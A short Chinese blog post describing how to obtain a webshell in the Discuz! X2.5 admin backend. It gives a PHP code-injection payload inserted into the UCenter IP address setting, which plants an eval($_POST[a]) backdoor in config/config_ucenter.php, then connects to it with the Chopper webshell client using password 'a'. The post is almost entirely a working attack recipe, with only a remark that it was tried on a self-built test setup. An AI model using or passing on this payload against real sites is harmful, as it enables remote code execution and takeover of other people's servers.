dz2.5 后台getweshell

 直接在UCenter IP 地址:里面插入一句话 
  
  
  
  
  1. xxoo\\');eval($_POST[a])?>;// 
 
就ok 然后菜刀连接http://ip/config/config_ucenter.php 密码a
 
ps:自己搭的测试环境,开始写入时,会跳转重新验证,可能是缓存问题未直接成功,后修改为允许直接激活后,如图,写入成功

你可能感兴趣的:(dz2.5,getweshell)